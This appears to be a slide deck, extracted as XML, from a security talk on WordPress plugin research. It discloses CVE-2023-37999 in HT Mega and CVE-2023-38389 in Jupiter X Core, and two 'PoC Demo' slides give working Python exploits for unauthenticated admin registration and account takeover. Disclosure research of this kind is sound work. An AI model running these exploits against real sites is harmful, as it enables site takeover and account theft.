          <a:prstGeom prst="flowChartConnecto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54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4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CVE-2023-37999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Unauth PrivEsc in HT Mega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757" name="Google Shape;757;p54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758" name="Google Shape;758;p54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54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0" name="Google Shape;760;p54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1" name="Google Shape;761;p54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2" name="Google Shape;762;p54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3" name="Google Shape;763;p54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764" name="Google Shape;764;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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765" name="Google Shape;765;p5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73600" y="130550"/>
            <a:ext cx="1216250" cy="12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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6499688" y="1628675"/>
            <a:ext cx="1479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PoC Demo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67" name="Google Shape;767;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="1292850"/>
            <a:ext cx="4962300" cy="363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import requests, sys</a:t>
            </a:r>
            <a:endParaRPr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BASE_URL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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= sys.argv[1]</a:t>
            </a:r>
            <a:endParaRPr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USERNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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= sys.argv[2]</a:t>
            </a:r>
            <a:endParaRPr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PASSWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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= sys.argv[3]</a:t>
            </a:r>
            <a:endParaRPr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ROLE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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   = sys.argv[4]</a:t>
            </a:r>
            <a:endParaRPr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form = {</a:t>
            </a:r>
            <a:endParaRPr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   "action":"htmega_ajax_register",</a:t>
            </a:r>
            <a:endParaRPr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   "reg_name":USERNAME,</a:t>
            </a:r>
            <a:endParaRPr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   "reg_email":USERNAME+"@pwned.pwned",</a:t>
            </a:r>
            <a:endParaRPr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   "reg_fname":USERNAME,</a:t>
            </a:r>
            <a:endParaRPr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   "reg_lname":USERNAME,</a:t>
            </a:r>
            <a:endParaRPr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   "reg_password":PASSWORD,</a:t>
            </a:r>
            <a:endParaRPr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   "reg_role":ROLE</a:t>
            </a:r>
            <a:endParaRPr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}</a:t>
            </a:r>
            <a:endParaRPr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res2 = requests.post(BASE_URL + "/wp-admin/admin-ajax.php", data=form)</a:t>
            </a:r>
            <a:endParaRPr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print(f"[+] User {USERNAME} with role {ROLE} created!")</a:t>
            </a:r>
            <a:endParaRPr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768" name="Google Shape;768;p54" title="PoC_HT-Mega_Privesc.mov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806850" y="2185725"/>
            <a:ext cx="2865600" cy="16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55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55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CVE-2023-38389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Unauth Account Takeover in Jupiter X Core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775" name="Google Shape;775;p55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776" name="Google Shape;776;p55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55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8" name="Google Shape;778;p55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55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0" name="Google Shape;780;p55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1" name="Google Shape;781;p55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pic>
        <p:nvPicPr>
          <p:cNvPr id="782" name="Google Shape;782;p5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80700" y="292150"/>
            <a:ext cx="839275" cy="8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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425"/>
            <a:ext cx="78255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Vulnerability Details (Premium Plugin)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Introduced: v?.?.? (??/??/????)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Patched: v3.4.3 (09/08/2023)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Vulnerable code age: ???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Active installation: 100k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Background Story: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Initially, searching for vulns on the custom registration process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56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56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CVE-2023-38389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Unauth Account Takeover in Jupiter X Core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790" name="Google Shape;790;p56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791" name="Google Shape;791;p56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2" name="Google Shape;792;p56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3" name="Google Shape;793;p56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56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p56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6" name="Google Shape;796;p56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797" name="Google Shape;797;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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798" name="Google Shape;798;p5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80700" y="292150"/>
            <a:ext cx="839275" cy="8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5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3401" y="1214900"/>
            <a:ext cx="3945426" cy="37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5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790426" y="4050308"/>
            <a:ext cx="4188252" cy="66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5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851375" y="2571750"/>
            <a:ext cx="4127299" cy="112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2" name="Google Shape;802;p56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="3997800" y="1535600"/>
            <a:ext cx="1190700" cy="965100"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 96823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03" name="Google Shape;803;p56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3917625" y="3688100"/>
            <a:ext cx="1246800" cy="328500"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 9079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04" name="Google Shape;804;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850300" y="1512700"/>
            <a:ext cx="412200" cy="161700"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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05" name="Google Shape;805;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872250" y="2748250"/>
            <a:ext cx="1647300" cy="360900"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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806" name="Google Shape;806;p56"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="804" idx="2"/>
            <a:endCxn id="805" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850300" y="1593550"/>
            <a:ext cx="21900" cy="1335300"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val -1333904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07" name="Google Shape;807;p56"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="805" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519550" y="2928700"/>
            <a:ext cx="751200" cy="712500"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 8958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08" name="Google Shape;808;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850300" y="1749625"/>
            <a:ext cx="412200" cy="161700"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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809" name="Google Shape;809;p56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262500" y="1835800"/>
            <a:ext cx="2399400" cy="1805400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 111092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57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57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CVE-2023-38389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Unauth Account Takeover in Jupiter X Core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816" name="Google Shape;816;p57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817" name="Google Shape;817;p57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8" name="Google Shape;818;p57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p57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0" name="Google Shape;820;p57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57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2" name="Google Shape;822;p57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pic>
        <p:nvPicPr>
          <p:cNvPr id="823" name="Google Shape;823;p5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80700" y="292150"/>
            <a:ext cx="839275" cy="8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5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365400" y="1268725"/>
            <a:ext cx="4413199" cy="379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58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58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CVE-2023-38389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Unauth Account Takeover in Jupiter X Core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831" name="Google Shape;831;p58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832" name="Google Shape;832;p58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p58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p58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Google Shape;835;p58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6" name="Google Shape;836;p58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7" name="Google Shape;837;p58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pic>
        <p:nvPicPr>
          <p:cNvPr id="838" name="Google Shape;838;p5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80700" y="292150"/>
            <a:ext cx="839275" cy="8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4200" y="1289600"/>
            <a:ext cx="5223949" cy="37598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0" name="Google Shape;840;p5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872625" y="1687375"/>
            <a:ext cx="4009050" cy="32730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1" name="Google Shape;841;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477375" y="1182950"/>
            <a:ext cx="10719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Patch?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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59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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="2712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CVE-2023-38389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Unauth Account Takeover in Jupiter X Core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848" name="Google Shape;848;p59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849" name="Google Shape;849;p59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p59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p59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p59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3" name="Google Shape;853;p59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4" name="Google Shape;854;p59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pic>
        <p:nvPicPr>
          <p:cNvPr id="855" name="Google Shape;855;p5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80700" y="292150"/>
            <a:ext cx="839275" cy="8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5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0400" y="1815825"/>
            <a:ext cx="7583224" cy="29325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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4036050" y="1313375"/>
            <a:ext cx="10719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Patch?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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60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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="133925"/>
            <a:ext cx="8135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CVE-2023-38389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Unauth Account Takeover in Jupiter X Core</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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864" name="Google Shape;864;p60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865" name="Google Shape;865;p60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6" name="Google Shape;866;p60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7" name="Google Shape;867;p60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8" name="Google Shape;868;p60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9" name="Google Shape;869;p60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0" name="Google Shape;870;p60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871" name="Google Shape;871;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6499688" y="1628675"/>
            <a:ext cx="1479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PoC Demo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872" name="Google Shape;872;p6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80700" y="292150"/>
            <a:ext cx="839275" cy="8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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="1037525"/>
            <a:ext cx="4962300" cy="400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import re, requests, sys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6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BASE_URL </a:t>
            </a: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= sys.argv[1]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6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SOCIAL_LOGIN_PATH </a:t>
            </a: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= sys.argv[2]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6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TARGET_USER_EMAIL </a:t>
            </a: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= sys.argv[3]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6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TARGET_FBID </a:t>
            </a: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= sys.argv[4]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res = requests.get(BASE_URL + SOCIAL_LOGIN_PATH).text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form_id = re.findall(r'widget-form" value="(.*?)"', res)[0]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print(f"[+] Form ID: {form_id}")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post_id = re.findall(r'widget-post" value="(.*?)"', res)[0]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print(f"[+] Post/Page ID: {post_id}")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form = {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   "action":"raven_form_frontend",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   "name":"pwned",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   "email":TARGET_USER_EMAIL,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   "fbid":TARGET_FBID,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   "post_id":post_id,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   "form_id":form_id,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   "social_network":"Facebook"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}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res2 = requests.post(BASE_URL + "/wp-admin/admin-ajax.php", data=form)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print(f"[+] Set the social-media-user-facebook-id meta value of {TARGET_USER_EMAIL} to {TARGET_FBID}")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link = f"http://localhost/?jupiterx-facebook-social-login=1&amp;jupiterx-facebook-social-login={TARGET_FBID}"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print(f"[+] Login as {TARGET_USER_EMAIL} with this link: {link}")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874" name="Google Shape;874;p60" title="PoC_JupiterX_ATO.mov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67225" y="2188700"/>
            <a:ext cx="2944851" cy="16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61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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667750" y="2183850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Closing Thoughts</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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881" name="Google Shape;881;p61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882" name="Google Shape;882;p61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Google Shape;883;p61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4" name="Google Shape;884;p61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5" name="Google Shape;885;p61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6" name="Google Shape;886;p61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7" name="Google Shape;887;p61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62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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="271225"/>
            <a:ext cx="7668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Conclusion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894" name="Google Shape;894;p62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895" name="Google Shape;895;p62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6" name="Google Shape;896;p62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7" name="Google Shape;897;p62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8" name="Google Shape;898;p62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9" name="Google Shape;899;p62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0" name="Google Shape;900;p62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901" name="Google Shape;901;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710600" y="1504650"/>
            <a:ext cx="7668600" cy="3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WordPress is pretty much still relevant from a security research perspective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Most of the critical and impactful bug found are rather just a simple but overlooked bug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</a:t>
            </a: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till lack of details and attention to commonly used action/process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More research needs to be done on the most popular components in the WordPress ecosystem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 lot more potential research on supply chain attack, specifically towards library and sub-plugin code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584275" y="271225"/>
            <a:ext cx="7668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Why target WordPress ?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115" name="Google Shape;115;p18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116" name="Google Shape;116;p18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8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8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8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8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18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122" name="Google Shape;122;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710600" y="1504650"/>
            <a:ext cx="76686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Powers 43.1% of all websites, and 34.68% are in the top 1 million websites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CMS market share of 63.0% in 2024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Open source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Easy to familiarize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PHP based :)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63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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584250" y="2127450"/>
            <a:ext cx="76686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Any questions?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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908" name="Google Shape;908;p63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909" name="Google Shape;909;p63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63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1" name="Google Shape;911;p63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2" name="Google Shape;912;p63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3" name="Google Shape;913;p63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4" name="Google Shape;914;p63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Google Shape;919;p64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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615575" y="406900"/>
            <a:ext cx="7668600" cy="4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Thank you!</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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(Terima Kasih)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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Feedback: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent6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https://bit.ly/rafieoffbyone </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent6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Reach me out on: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921" name="Google Shape;921;p64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922" name="Google Shape;922;p64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3" name="Google Shape;923;p64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4" name="Google Shape;924;p64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5" name="Google Shape;925;p64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" name="Google Shape;926;p64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7" name="Google Shape;927;p64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928" name="Google Shape;928;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163425" y="4322300"/>
            <a:ext cx="1471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@yeraisci_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929" name="Google Shape;929;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3230350" y="4322300"/>
            <a:ext cx="2069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rafiemuhammad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930" name="Google Shape;930;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5861725" y="4322300"/>
            <a:ext cx="2443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https://yeraisci.com/ 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931" name="Google Shape;931;p6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4825" y="4229800"/>
            <a:ext cx="657274" cy="65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6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28475" y="4322288"/>
            <a:ext cx="531973" cy="531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6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326125" y="4279687"/>
            <a:ext cx="617150" cy="61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737700" y="2183850"/>
            <a:ext cx="766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WordPress</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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129" name="Google Shape;129;p19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130" name="Google Shape;130;p19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9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9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9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9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19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pic>
        <p:nvPicPr>
          <p:cNvPr id="136" name="Google Shape;136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991525" y="2931700"/>
            <a:ext cx="1160950" cy="11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584275" y="271225"/>
            <a:ext cx="7668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Knowing WordPress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143" name="Google Shape;143;p20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144" name="Google Shape;144;p20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0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0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0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0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20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150" name="Google Shape;150;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710600" y="1504650"/>
            <a:ext cx="76686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Core - The CMS </a:t>
            </a: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platform</a:t>
            </a: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itself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Plugin - An additional piece of software that can be installed on a WordPress website to extend its functionality and add new features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Theme - An additional piece of software that represents the visual appearance and layout of a WordPress website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1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584275" y="271225"/>
            <a:ext cx="7668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WordPress Free Repository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157" name="Google Shape;157;p21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158" name="Google Shape;158;p21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1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1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1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1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21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164" name="Google Shape;164;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2248650" y="1459875"/>
            <a:ext cx="4646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60K Plugins</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="72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12K Themes</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="72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b="36003" l="1985" r="27363" t="3990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>
            <a:off x="584275" y="271225"/>
            <a:ext cx="7668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Scanning WordPress Codebase</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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171" name="Google Shape;171;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="5432832"/>
            <a:ext cx="8229594" cy="474343"/>
            <a:chOff x="457200" y="5432832"/>
            <a:chExt cx="8229594" cy="474343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="172" name="Google Shape;172;p22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2809" y="5507903"/>
              <a:ext cx="779200" cy="3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2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8471" y="5588591"/>
              <a:ext cx="858324" cy="16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2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5726" y="5545391"/>
              <a:ext cx="59902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2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68818" y="5432832"/>
              <a:ext cx="1140100" cy="47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2">
              <a:hlinkClick r:id="rId12"/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161562" y="5432841"/>
              <a:ext cx="1140100" cy="4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2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="5485353"/>
              <a:ext cx="107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As seen on</a:t>
              </a:r>
              <a:endParaRPr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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666488" y="1579275"/>
            <a:ext cx="77568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WordPress Core/Plugins/Themes has SVN/Trac repositories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Char char="●"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Got a word or regex pattern to search for potential affected plugins/themes ? There is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Darker Grotesque"/>
                <a:ea typeface="Darker Grotesque"/>
                <a:cs typeface="Darker Grotesque"/>
                <a:sym typeface="Darker Grotesque"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://wpdirectory.net/</a:t>
            </a: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83450" y="3014475"/>
            <a:ext cx="8122900" cy="16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